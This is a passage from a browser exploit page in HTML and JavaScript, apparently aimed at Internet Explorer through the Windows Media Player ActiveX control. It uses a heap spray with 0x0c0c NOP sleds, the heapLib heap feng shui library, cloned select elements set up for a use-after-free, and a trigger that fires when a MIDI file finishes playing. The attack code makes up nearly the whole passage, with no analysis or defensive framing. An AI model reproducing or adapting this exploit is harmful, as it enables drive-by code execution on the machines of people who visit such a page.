var nops=unescape("%u0c0c%u0c0c");while(nops.length<4096){nops+=nops;}var shellcode=nops.substring(0,2048-code.length)+code;while(shellcode.length<262144){shellcode+=shellcode;}var block=shellcode.substring(0,(524288-6)/2);heap_obj.gc();for(var i=0;i<600;i++){heap_obj.alloc(block);}function heapLib(){}heapLib.ie=function(b,a){this.maxAlloc=(b?b:65535);this.heapBase=(a?a:1376256);this.paddingStr="AAAA";while(4+this.paddingStr.length*2+2<this.maxAlloc){this.paddingStr+=this.paddingStr;}this.mem=new Array();this.flushOleaut32();};heapLib.ie.prototype.debug=function(a){void (Math.atan2(47806,a));};heapLib.ie.prototype.debugHeap=function(a){if(a==true){void (Math.atan(47806));}else{void (Math.asin(47806));}};heapLib.ie.prototype.debugBreak=function(a){void (Math.acos(47806));};heapLib.ie.prototype.padding=function(a){if(a>this.paddingStr.length){throw"Requested padding string length "+a+", only "+this.paddingStr.length+" available";}return this.paddingStr.substr(0,a);};heapLib.ie.prototype.round=function(b,a){if(a==0){throw"Round argument cannot be 0";}return parseInt((b+(a-1))/a)*a;};heapLib.ie.prototype.hex=function(a,b){var d="0123456789ABCDEF";var c=d.substr(a&15,1);while(a>15){a=a>>>4;c=d.substr(a&15,1)+c;}var b=(b?b:0);while(c.length<b){c="0"+c;}return c;};heapLib.ie.prototype.addr=function(a){return unescape("%u"+this.hex(a&65535,4)+"%u"+this.hex((a>>16)&65535,4));};heapLib.ie.prototype.allocOleaut32=function(b,a){var c;if(typeof b=="string"||b instanceof String){c=4+b.length*2+2;}else{c=b;}if((c&15)!=0){throw"Allocation size "+c+" must be a multiple of 16";}if(this.mem[a]===undefined){this.mem[a]=new Array();}if(typeof b=="string"||b instanceof String){this.mem[a].push(b.substr(0,b.length));}else{this.mem[a].push(this.padding((b-6)/2));}};heapLib.ie.prototype.freeOleaut32=function(a){delete this.mem[a];CollectGarbage();};heapLib.ie.prototype.flushOleaut32=function(){this.debug("Flushing the OLEAUT32 cache");this.freeOleaut32("oleaut32");for(var a=0;a<6;a++){this.allocOleaut32(32,"oleaut32");this.allocOleaut32(64,"oleaut32");this.allocOleaut32(256,"oleaut32");this.allocOleaut32(32768,"oleaut32");}};heapLib.ie.prototype.alloc=function(b,a){var c;if(typeof b=="string"||b instanceof String){c=4+b.length*2+2;}else{c=b;}if(c==32||c==64||c==256||c==32768){throw"Allocation sizes "+c+" cannot be flushed out of the OLEAUT32 cache";}this.allocOleaut32(b,a);};heapLib.ie.prototype.free=function(a){this.freeOleaut32(a);this.flushOleaut32();};heapLib.ie.prototype.gc=function(){this.debug("Running the garbage collector");CollectGarbage();this.flushOleaut32();};heapLib.ie.prototype.freeList=function(a,c){var c=(c?c:1);for(var b=0;b<c;b++){this.alloc(a);this.alloc(a,"freeList");}this.alloc(a);this.free("freeList");};heapLib.ie.prototype.lookaside=function(a,d){var c;if(typeof a=="string"||a instanceof String){c=4+a.length*2+2;}else{c=a;}if((c&15)!=0){throw"Allocation size "+c+" must be a multiple of 16";}if(c+8>=1024){throw ("Maximum lookaside block size is 1008 bytes");}var d=(d?d:1);for(var b=0;b<d;b++){this.alloc(a,"lookaside");}this.free("lookaside");};heapLib.ie.prototype.lookasideAddr=function(a){var b;if(typeof a=="string"||a instanceof String){b=4+a.length*2+2;}else{b=a;}if((b&15)!=0){throw"Allocation size "+b+" must be a multiple of 16";}if(b+8>=1024){throw ("Maximum lookaside block size is 1008 bytes");}return this.heapBase+1672+((b+8)/8)*48;};heapLib.ie.prototype.vtable=function(b,e,d){var d=(d?d:1008);if((d&15)!=0){throw"Vtable size "+d+" must be a multiple of 16";}if(b.length*2>d-138){throw ("Maximum shellcode length is "+(d-138)+" bytes");}var a=unescape("%u9090%u7ceb");for(var c=0;c<124/4;c++){a+=this.addr(e);}a+=unescape("%u0028%u0028")+b+heap.padding((d-138)/2-b.length);return a;};var heap=new heapLib.ie();var selob=document.createElement("select");selob.w0=unescape("%u0c0c%u0c0c");selob.w1=alert;selob.w2=alert;selob.w3=alert;selob.w4=alert;selob.w5=alert;selob.w6=alert;selob.w7=alert;selob.w8=alert;selob.w9=alert;selob.w10=alert;selob.w11=alert;selob.w12=alert;selob.w13=alert;selob.w14=alert;selob.w15=alert;selob.w16=alert;selob.w17=alert;selob.w18=alert;selob.w19=alert;selob.w20=alert;selob.w21=alert;selob.w22=alert;selob.w23=alert;selob.w24=alert;selob.w25=alert;selob.w26=alert;selob.w27=alert;selob.w28=alert;selob.w29=alert;selob.w30=alert;selob.w31=alert;selob.w32=alert;selob.w33=alert;selob.w34=alert;selob.w35=alert;selob.w36=alert;selob.w37=alert;selob.w38=alert;selob.w39=alert;selob.w40=alert;selob.w41=alert;selob.w42=alert;selob.w43=alert;selob.w44=alert;selob.w45=alert;selob.w46=alert;selob.w47=alert;selob.w48=alert;selob.w49=alert;selob.w50=alert;selob.w51=alert;selob.w52=alert;selob.w53=alert;selob.w54=alert;selob.w55=alert;var clones=new Array(1000);function feng_shui(){heap.gc();var b=0;while(b<1000){clones[b]=selob.cloneNode(true);b=b+1;}var a=0;while(a<1000){delete clones[a];CollectGarbage();a=a+2;}}feng_shui();function trigger(){var a=999;while(a>0){if(typeof(clones[a].w0)=="string"){}else{clones[a].w0("come on!");}a=a-2;}feng_shui();document.audio.Play();}


</script>
<script for=audio event=PlayStateChange(oldState,newState)>
	if (oldState == 3 && newState == 0) {
		trigger();
	}
</script>
</head>
<body>
	<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
		<param name="fileName" value="test_case.mid">
		<param name="SendPlayStateChangeEvents" value="true">
		<param NAME="AutoStart" value="True">
		<param name="uiMode" value="mini">
		<param name="Volume" value="-300">
	</object>
</body>
</html>
